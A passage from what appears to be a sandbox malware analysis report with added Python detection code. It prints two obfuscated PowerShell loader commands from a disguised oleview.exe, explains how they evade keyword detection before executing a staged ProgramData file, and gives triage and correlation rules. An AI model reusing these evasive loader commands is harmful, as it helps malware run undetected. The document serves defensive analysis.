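    ProcEvent(SAMPLE, WU24 + r"\oleview.exe", WU24 + r"\oleview.exe"),
    ProcEvent(PS, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe", r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b0okydtw\b0okydtw.cmdline"'),
    ProcEvent(PS, r"C:\Windows\System32\whoami.exe", r'"C:\Windows\system32\whoami.exe"'),
]

# Assumed internal DNS suffixes; any other host handed to w32tm /monitor is "external".
INTERNAL_SUFFIXES = (".corp.example",)


def _base(path):
    return ntpath.basename(path).lower()


def _dir(path):
    return ntpath.dirname(path).lower()


def run_rules(events):
    """Apply per-event rules and return a list of (rule, detail) findings."""
    findings = []
    for e in events:
        img, cmd = _base(e.image), e.cmdline
        if img == "gpg.exe" and "--passphrase" in cmd and "--decrypt" in cmd:
            m = re.search(r"--output\s+(\S+)", cmd)
            findings.append(("gpg_inline_passphrase_decrypt", m.group(1) if m else cmd))
        if img in ("7za.exe", "7z.exe") and re.search(r"\s-p\S+", cmd):
            m = re.search(r"\s-o(\S+)", cmd)
            findings.append(("archive_extract_with_password", m.group(1) if m else cmd))
        if img == "w32tm.exe":
            m = re.search(r"/computers:(\S+)", cmd, re.I)
            if m and not m.group(1).lower().endswith(INTERNAL_SUFFIXES):
                findings.append(("w32tm_monitor_external_host", m.group(1)))
        if img == "sc.exe":
            m = re.search(r"\bconfig\s+(\S+)\s+(start|obj)=", cmd, re.I)
            if m:
                findings.append(("service_reconfigured", f"{m.group(1)} {m.group(2)}="))
        if _dir(e.image).startswith(r"c:\programdata"):
            findings.append(("binary_executed_from_programdata", e.image))
        if _base(e.parent) == "powershell.exe" and img in ("csc.exe", "whoami.exe"):
            findings.append(("powershell_child_compiler_or_recon", img))
    return findings


def staging_chain(events):
    """Correlate gpg --output -> 7za x -o<dir> -> binary launched from <dir>."""
    decrypted = set()
    for e in events:
        if _base(e.image) == "gpg.exe":
            m = re.search(r"--output\s+(\S+)", e.cmdline)
            if m:
                decrypted.add(m.group(1).lower())
    extracted_dirs = set()
    for e in events:
        if _base(e.image) in ("7za.exe", "7z.exe"):
            m = re.search(r"\s[xe]\s+(\S+).*\s-o(\S+)", e.cmdline)
            if m and m.group(1).lower() in decrypted:
                extracted_dirs.add(m.group(2).lower())
    # Binaries run out of an extraction directory; the decryptor and unpacker
    # are excluded because they are the staging tools themselves.
    launched = [e for e in events
                if _dir(e.image) in extracted_dirs
                and _base(e.image) not in ("gpg.exe", "7za.exe", "7z.exe")]
    return {"decrypted": decrypted, "extracted_dirs": extracted_dirs, "launched": launched}


if __name__ == "__main__":
    for rule, detail in run_rules(EVENTS):
        print(f"{rule:40} {detail}")
    print("launched from extraction dir:", [e.image for e in staging_chain(EVENTS)["launched"]])
```

The per-event rules fire on their own, but the chain correlation is what separates this from a developer who happens to use gpg and 7-Zip: the archive that 7za unpacks must be a gpg --output, and the binary that runs afterwards must live in the 7za -o directory. Replace EVENTS with Sysmon event 1 or EDR process-start records (parent image, image, command line) to run it on telemetry.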
Source: C:\ProgramData\Microsoft\WindowsUpdate24\oleview.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -command "si variable:/e $('c:\progra'+'mdata\mic'+'rosoft\wind'+'owsupdate24\kau'+'tix2ae'+'x.t');popd;set-variable x (.(item variable:*xec*t).value.invokecommand.(((item variable:*xec*t).value.invokecommand|get-member|where-object{(ls variable:\_).value.name-like'*mma*d'}).name).invoke((item variable:*xec*t).value.invokecommand.(((item variable:*xec*t).value.invokecommand|get-member|where-object{(ls variable:\_).value.name-like'*dname'}).name).invoke('*w-*ct',1,1),[management.automation.commandtypes]::cmdlet)net.webclient);(get-childitem variable:\x).value.((((get-childitem variable:\x).value|get-member)|where-object{(ls variable:\_).value.name-like'*nl*g'}).name).invoke((gci variable:\e).value)|.( ([string]''.normalize)[77,35,46]-join'')"
Source: C:\ProgramData\Microsoft\LogUpdateWindows\oleview.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -command "si variable:/go $('c:\pro'+'gramdata\mic'+'roso'+'ft\logup'+'datewi'+'ndows\wiaph'+'oh7um.t');set-item variable:/fh 'net.webclient';dir ect*;sv bo (.$executioncontext.(($executioncontext|gm)[6].name).(($executioncontext.(($executioncontext|gm)[6].name).psobject.methods|where{(get-childitem variable:\_).value.name-like'*dl*ts'}).name).invoke('ne*ct')(variable fh -value));si variable:2rn ((((get-childitem variable:/bo).value|gm)|where{(get-childitem variable:\_).value.name-like'*nl*g'}).name);invoke-command(($executioncontext|foreach{(get-childitem variable:\_).value.(($executioncontext|gm)[6].name)|foreach{(gci variable:\_).value.newscriptblock((get-childitem variable:/bo).value.((item variable:/2rn).value).invoke((gi variable:/go).value))}}))"
Source: C:\ProgramData\Microsoft\WindowsUpdate24\oleview.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -command "si variable:/e $('c:\progra'+'mdata\mic'+'rosoft\wind'+'owsupdate24\kau'+'tix2ae'+'x.t');popd;set-variable x (.(item variable:*xec*t).value.invokecommand.(((item variable:*xec*t).value.invokecommand|get-member|where-object{(ls variable:\_).value.name-like'*mma*d'}).name).invoke((item variable:*xec*t).value.invokecommand.(((item variable:*xec*t).value.invokecommand|get-member|where-object{(ls variable:\_).value.name-like'*dname'}).name).invoke('*w-*ct',1,1),[management.automation.commandtypes]::cmdlet)net.webclient);(get-childitem variable:\x).value.((((get-childitem variable:\x).value|get-member)|where-object{(ls variable:\_).value.name-like'*nl*g'}).name).invoke((gci variable:\e).value)|.( ([string]''.normalize)[77,35,46]-join'')"
Source: C:\ProgramData\Microsoft\LogUpdateWindows\oleview.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -command "si variable:/go $('c:\pro'+'gramdata\mic'+'roso'+'ft\logup'+'datewi'+'ndows\wiaph'+'oh7um.t');set-item variable:/fh 'net.webclient';dir ect*;sv bo (.$executioncontext.(($executioncontext|gm)[6].name).(($executioncontext.(($executioncontext|gm)[6].name).psobject.methods|where{(get-childitem variable:\_).value.name-like'*dl*ts'}).name).invoke('ne*ct')(variable fh -value));si variable:2rn ((((get-childitem variable:/bo).value|gm)|where{(get-childitem variable:\_).value.name-like'*nl*g'}).name);invoke-command(($executioncontext|foreach{(get-childitem variable:\_).value.(($executioncontext|gm)[6].name)|foreach{(gci variable:\_).value.newscriptblock((get-childitem variable:/bo).value.((item variable:/2rn).value).invoke((gi variable:/go).value))}}))"
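The two PowerShell command lines above avoid every tell-tale token. The path of the staged file is assembled from string fragments, $executioncontext is reached either through the variable: provider with a wildcard (variable:*xec*t) or by numeric index into its Get-Member output, New-Object (GetCommandName '*w-*ct' / GetCmdlets 'ne*ct') and DownloadString (the '*nl*g' pattern) are looked up with -like patterns, and the first variant spells iex by picking three characters out of the string form of [string]''.Normalize. Both variants end up reading a local .t file from ProgramData through net.webclient and executing its contents, one via Invoke-Expression and the other via NewScriptBlock plus Invoke-Command. The following is an added example, not code from the report or from the sample: a static triage in Python that rebuilds the concatenated literals, resolves the index trick and scores the obfuscation primitives. It assumes the overload string that Windows PowerShell 5.1 on .NET Framework produces for [string]''.Normalize; the indicator names and weights are this example's own.

```python
"""Static triage of the obfuscated PowerShell command lines reported above.

Added example, not part of the Joe Sandbox report or the sample. The two
command lines are copied from the report; the function names, indicator
list and the assumed overload string for [string]''.Normalize are this
example's own.
"""
import re

# Command lines exactly as reported (each is a child of oleview.exe).
CMD_WINDOWSUPDATE24 = r'''powershell.exe -windowstyle hidden -command "si variable:/e $('c:\progra'+'mdata\mic'+'rosoft\wind'+'owsupdate24\kau'+'tix2ae'+'x.t');popd;set-variable x (.(item variable:*xec*t).value.invokecommand.(((item variable:*xec*t).value.invokecommand|get-member|where-object{(ls variable:\_).value.name-like'*mma*d'}).name).invoke((item variable:*xec*t).value.invokecommand.(((item variable:*xec*t).value.invokecommand|get-member|where-object{(ls variable:\_).value.name-like'*dname'}).name).invoke('*w-*ct',1,1),[management.automation.commandtypes]::cmdlet)net.webclient);(get-childitem variable:\x).value.((((get-childitem variable:\x).value|get-member)|where-object{(ls variable:\_).value.name-like'*nl*g'}).name).invoke((gci variable:\e).value)|.( ([string]''.normalize)[77,35,46]-join'')"'''
CMD_LOGUPDATEWINDOWS = r'''powershell.exe -windowstyle hidden -command "si variable:/go $('c:\pro'+'gramdata\mic'+'roso'+'ft\logup'+'datewi'+'ndows\wiaph'+'oh7um.t');set-item variable:/fh 'net.webclient';dir ect*;sv bo (.$executioncontext.(($executioncontext|gm)[6].name).(($executioncontext.(($executioncontext|gm)[6].name).psobject.methods|where{(get-childitem variable:\_).value.name-like'*dl*ts'}).name).invoke('ne*ct')(variable fh -value));si variable:2rn ((((get-childitem variable:/bo).value|gm)|where{(get-childitem variable:\_).value.name-like'*nl*g'}).name);invoke-command(($executioncontext|foreach{(get-childitem variable:\_).value.(($executioncontext|gm)[6].name)|foreach{(gci variable:\_).value.newscriptblock((get-childitem variable:/bo).value.((item variable:/2rn).value).invoke((gi variable:/go).value))}}))"'''

# ToString() of the PSMethod [string]''.Normalize as Windows PowerShell 5.1 on
# .NET Framework renders it (assumption: confirm on the host build you analyse).
# Indexing single characters out of it is how the script spells "iex" without
# ever writing that token.
NORMALIZE_OVERLOADS = ("string Normalize(), "
                       "string Normalize(System.Text.NormalizationForm normalizationForm)")

CONCAT_RE = re.compile(r"\$\(\s*('[^']*'(?:\s*\+\s*'[^']*')+)\s*\)")
INDEX_TRICK_RE = re.compile(r"\(\[string\]''\.normalize\)\[([0-9,\s]+)\]\s*-join\s*''", re.I)

# Obfuscation primitives seen in these command lines; one point each.
INDICATORS = {
    "hidden_window": r"-windowstyle\s+hidden",
    "variable_provider_path": r"\b(?:si|set-item|sv|set-variable|gci|gi|ls|dir|item|get-childitem|get-item)\s+variable:",
    "wildcard_variable_lookup": r"variable:[^\s)]*\*",          # variable:*xec*t
    "member_enumeration": r"\|\s*(?:gm|get-member)\b",
    "wildcard_member_lookup": r"\.name\s*-like\s*'[^']*\*[^']*'",  # '*mma*d' -> GetCommand
    "executioncontext_reflection": r"executioncontext|invokecommand",
    "webclient": r"net\.webclient",
    "concatenated_literal": r"\$\(\s*'[^']*'\s*\+",
    "dynamic_code_execution": r"newscriptblock|\[string\]''\.normalize",
}


def join_string_concats(cmd):
    """Rebuild every $('a'+'b'+...) expression into the literal it evaluates to."""
    return ["".join(re.findall(r"'([^']*)'", m.group(1))) for m in CONCAT_RE.finditer(cmd)]


def resolve_normalize_index_trick(cmd):
    """Resolve ([string]''.normalize)[i,j,k]-join'' into the characters it selects."""
    out = []
    for m in INDEX_TRICK_RE.finditer(cmd):
        idx = [int(i) for i in m.group(1).replace(" ", "").split(",")]
        out.append("".join(NORMALIZE_OVERLOADS[i] for i in idx))
    return out


def triage(cmd):
    """Score a command line and return the recovered literals alongside the hits."""
    hits = [name for name, pat in INDICATORS.items() if re.search(pat, cmd, re.I)]
    literals = join_string_concats(cmd)
    if any(s.lower().startswith(r"c:\programdata") for s in literals):
        hits.append("concatenated_path_under_programdata")
    return {
        "indicators": hits,
        "score": len(hits),
        "literals": literals,
        "resolved_tokens": resolve_normalize_index_trick(cmd),
    }


if __name__ == "__main__":
    for label, cmd in (("WindowsUpdate24", CMD_WINDOWSUPDATE24),
                       ("LogUpdateWindows", CMD_LOGUPDATEWINDOWS)):
        print(label, triage(cmd))
```

The recovered literals are the staged-file paths worth collecting from an affected host; the indicator hits are what a command-line rule should key on, since none of the usual strings (iex, Invoke-Expression, New-Object, DownloadString) appear verbatim. Script block logging (event 4104) still records the de-obfuscated code at execution time, which is the more robust source if it is enabled.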
Source: C:\Users\user\Desktop\VirtManage.exe	Code function: 0_2_6C701096 GetModuleFileNameW,GlobalAlloc,CharPrevW,GlobalFree,GetTempFileNameW,CopyFileW,CreateFileW,CreateFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,CloseHandle,lstrcatW,lstrlenW,GlobalAlloc,FindWindowExW,FindWindowExW,FindWindowExW,lstrcmpiW,lstrcmpiW,lstrcmpiW,DeleteFileW,GetVersion,GlobalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreatePipe,CreatePipe,CreatePipe,GetStartupInfoW,CreateProcessW,lstrcpyW,GetTickCount,WaitForSingleObject,GetExitCodeProcess,PeekNamedPipe,GetTickCount,ReadFile,IsTextUnicode,IsDBCSLeadByteEx,MultiByteToWideChar,lstrcpyW,GlobalReAlloc,lstrcpyW,GetTickCount,TerminateProcess,lstrcpyW,Sleep,lstrcpyW,wsprintfW,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,DeleteFileW,GlobalFree,GlobalFree,GlobalFree,	0_2_6C701096
Source: C:\Users\user\Desktop\VirtManage.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\VirtManage.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\VirtManage.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\VirtManage.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\VirtManage.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\VirtManage.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\VirtManage.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\VirtManage.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
